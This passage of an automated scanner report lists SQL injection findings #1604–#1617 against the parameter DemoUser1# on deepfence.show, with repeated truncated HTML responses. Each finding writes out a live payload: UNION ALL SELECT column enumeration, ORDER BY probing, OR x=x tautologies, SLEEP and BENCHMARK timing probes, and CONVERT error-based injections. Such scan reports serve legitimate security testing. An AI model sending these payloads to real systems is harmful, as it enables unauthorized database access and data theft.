href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1604\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1605\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=y#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1606\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 31337\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1607\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1608\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1609\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1610\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1611\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1612\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1613Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1614\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1615\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=x#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1616\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# \") or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1617\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 